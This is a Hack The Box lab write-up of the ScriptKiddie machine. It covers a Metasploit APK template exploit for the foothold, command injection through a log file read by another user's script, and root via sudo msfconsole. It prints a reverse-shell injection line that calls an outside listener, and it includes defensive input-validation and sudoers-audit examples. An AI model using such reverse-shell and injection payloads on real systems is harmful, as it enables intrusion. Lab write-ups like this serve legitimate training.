Hack The Box: ScriptKiddie Writeup

Louis Low
6 min read · Jun 6, 2021

After a long hiatus to focus on school and an internship stint ever since achieving OSCP, I am finally back on Hack-The-Box working on all the active boxes, hoping to clear all of the active boxes at one point. In this series, I will be releasing the write-up for boxes that I have successfully rooted as they are retired from the active boxes.

In this first post of the series, I will share how to root ScriptKiddie. ScriptKiddie is an easy Linux box. The initial foothold comes from a CVE in the Metasploit Framework which, true to the box's title, means we are hacking a "scriptkiddie". Privilege escalation is done through command injection to reach the pwn user, who can run msfconsole with root privileges; that console lets us read root.txt.

Recon

To begin this box, we first carry out basic reconnaissance. I used AutoRecon, developed and scripted by Tib3rius; it is one of the fundamental scans I run before moving on to more manual enumeration of specific ports or applications. From the quick Nmap scan results produced by AutoRecon:

In our Nmap scan, we see that ports 22 and 5000 are open. Port 22 shows OpenSSH 8.2p1 Ubuntu; a quick Google search maps that version to Ubuntu Focal (Ubuntu 20.04). Port 5000 shows Werkzeug httpd 0.16.1, and that is where we start enumeration and information gathering on the target.

Information Gathering

Browsing to 10.10.10.226:5000, we are directed to the following page:

There are several user input fields here. First we tested for command injection, but there was nothing much in the other fields. Next, we notice that the payloads section is a payload-generation feature based on some form of template file, which we could presumably create with msfvenom. This gave us the idea that if we can upload our own msfvenom payload and trigger it, we can get a shell. So we tried an ELF file generated by msfvenom, but that was not very successful. However, when we tried to upload with the Android option:

It says that a file with an .apk extension is required when we attempt to upload the ELF file we generated. This gave us the idea to Google for APK files and Metasploit, which led us to the following CVE, which looks like a good fit for our use case. Following this:

We modify the payload by injecting our reverse-shell command with our listening host and port:

We then execute the python script to generate our evil.apk file:

We then upload the generated evil.apk as the template on the web application, check our listener and see that we have obtained a shell:

We then grab the user.txt flag:

To maintain our foothold, we add our public key to kid's authorized_keys so we can SSH in as kid. We then continue over SSH.

Privilege Escalation

Checking kid's home directory, we notice a logs folder:

Checking what these files are:

We also notice that we can list the contents of pwn's home directory. Inside it there is a script called scanloser.sh. The script reads the hackers file in the logs folder of kid's home directory, to which kid has write permission.

We can inject a command by writing into the hackers file in kid's logs folder. Notice that the script uses a cut command that splits on spaces, so through trial and error we find that the payload needs two leading spaces to work:

;/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.6/1234 0>&1' #

After adding this line to the hackers file, we check our listener:
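To make the injection point and its fix concrete, here is an added example that is not the box's scanloser.sh (the real file is not shown in this write-up). It reproduces the pattern described above, a cut on spaces followed by sh -c on the raw field, beside a version that validates the field before using it; the field choice `cut -d' ' -f3-` is an assumption that matches the two-leading-spaces quirk, and the log lines and the injected text (a harmless `echo`) are constructed:

```shell
#!/bin/sh
# Added example, not the box's script: the unsafe "cut then sh -c" pattern
# next to a validating version. "echo scanning" stands in for the scanner
# so the example runs offline.

# Constructed sample log: two real entries, a duplicate, and one injected
# line. The injected line starts with two spaces so fields 1 and 2 are empty
# and field 3 onwards is the attacker-controlled text.
make_sample_log() {
    f=$(mktemp)
    printf '%s\n' \
        '[2021-06-06] ip: 10.10.14.5' \
        '[2021-06-06] ip: 192.168.1.10' \
        '  ;echo INJECTED #' \
        '[2021-06-06] ip: 10.10.14.5' > "$f"
    printf '%s\n' "$f"
}

# Unsafe: the field is spliced into a command string that sh -c re-parses, so
# a ';' in the log ends the intended command and starts another one.
unsafe_scan() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r ip; do
        sh -c "echo scanning ${ip}"
    done
}

# Strict IPv4 check with POSIX tools only: four dotted decimal octets <= 255.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(printf '%s\n' "$1" | tr '.' ' '); do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Safe: validate the field, then hand it to the command as a single argument
# (no sh -c, so nothing re-parses it); anything that fails validation is
# reported on stderr instead of being executed.
safe_scan() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf 'scanning %s\n' "$ip"   # real script: scanner -- "$ip"
        else
            printf 'rejected: %s\n' "$ip" >&2
        fi
    done
}

# Run with "demo" as the first argument to see both behaviours side by side.
if [ "${1:-}" = "demo" ]; then
    log=$(make_sample_log)
    echo "--- unsafe ---"; unsafe_scan "$log"
    echo "--- safe ---";   safe_scan "$log"
    rm -f "$log"
fi
```

The unsafe loop prints an extra `INJECTED` line because `sh -c` re-parses the field; the safe loop scans only the two real addresses and reports the injected line on stderr. The two changes that matter are the allow-list check and passing the value as one argument rather than through a second shell.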

Checking our sudo permissions as pwn, we see that pwn can run msfconsole as root without a password. Using this we can get a root "shell".

We see that we can execute commands from msfconsole as if we were in a shell. We then use nc to create a reverse shell as root to another listener:

Checking our listener:

We obtained root.txt and rooted the machine!

Learning Points

Funnily enough, the machine is named ScriptKiddie, and I do not really see why anyone would need to host their tools on a server and let people upload template files and use those tools through a web service. Normally I would write about how the box could be better secured if it were a real machine; for this box, I just do not see any real reason why someone would host this on a web server. For the privilege escalation from kid to pwn and from pwn to root, however, I felt it came down to misplaced trust: root allowed pwn to use sudo without a password, and when one user's script consumes input from a file owned by another user, it is important to check the input it reads and apply some form of validation or sanitisation before using it in the script. Being able to inject commands and elevate ourselves to pwn, a user trusted by root, is what allowed us to root this machine.
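The misplaced-trust point is something a defender can check for mechanically. The following is an added example, not anything from the box: a small sudoers audit that lists NOPASSWD rules and flags the ones whose command is an interactive tool, since a console such as msfconsole running as root is a root shell in all but name. The sudoers sample, the msfconsole path and the list of interactive basenames are constructed placeholders for illustration:

```shell
#!/bin/sh
# Added example, not from the box: list NOPASSWD sudoers rules and flag the
# ones that hand the caller an interactive session as the runas user.

# Constructed sudoers sample; the msfconsole path is a placeholder.
make_sample_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not the box's real sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
pwn     ALL=(root) NOPASSWD: /opt/metasploit-framework/msfconsole
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
backup  ALL=(root) /usr/bin/rsync   # still needs a password, so not flagged
EOF
    printf '%s\n' "$f"
}

# Print "user runas command" for every NOPASSWD rule. Comments are stripped
# first; Defaults lines never grant commands and are skipped.
audit_sudoers() {
    sed 's/[[:blank:]]*#.*//' "$1" | awk '
        /NOPASSWD:/ && $1 != "Defaults" {
            user = $1
            runas = "ALL"
            if (match($0, /\([^)]*\)/)) runas = substr($0, RSTART + 1, RLENGTH - 2)
            sub(/.*NOPASSWD:[ \t]*/, "")
            print user, runas, $0
        }'
}

# Read audit_sudoers output on stdin and flag commands whose basename is an
# interactive tool (illustrative list, an assumption here, not exhaustive).
flag_interactive() {
    while read -r user runas cmd; do
        base=${cmd%% *}
        base=${base##*/}
        case "$base" in
            msfconsole|sh|bash|dash|zsh|python*|perl|ruby|vi|vim|less|more)
                printf '%s: NOPASSWD %s gives an interactive session as %s\n' \
                    "$user" "$cmd" "$runas" ;;
        esac
    done
}

# Run with "demo" as the first argument to audit the constructed sample.
if [ "${1:-}" = "demo" ]; then
    f=$(make_sample_sudoers)
    audit_sudoers "$f" | flag_interactive
    rm -f "$f"
fi
```

On the sample, only the pwn rule is flagged: the deploy rule is also NOPASSWD but points at a single non-interactive command, which is the shape a passwordless sudo rule should have if one is needed at all. Pointing the audit at `/etc/sudoers` and the files under `/etc/sudoers.d` covers a real host.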

Overall the box was pretty okay, with a bit of trial and error on my part (maybe that is something I need to improve on too). However, this box is just not realistic in terms of getting user.

Thank you for reading! As always, if you enjoy these write-ups, subscribe to my publication or follow me on Twitter @lojomojo96 and hit me up with a DM! Let me know what else you would like to see me write about.

https://twitter.com/lojomojo96

https://www.linkedin.com/in/louis-joshua-low/


Louis Low

Security Engineer by Day | Security Researcher by Night | Bug Bounty Hunting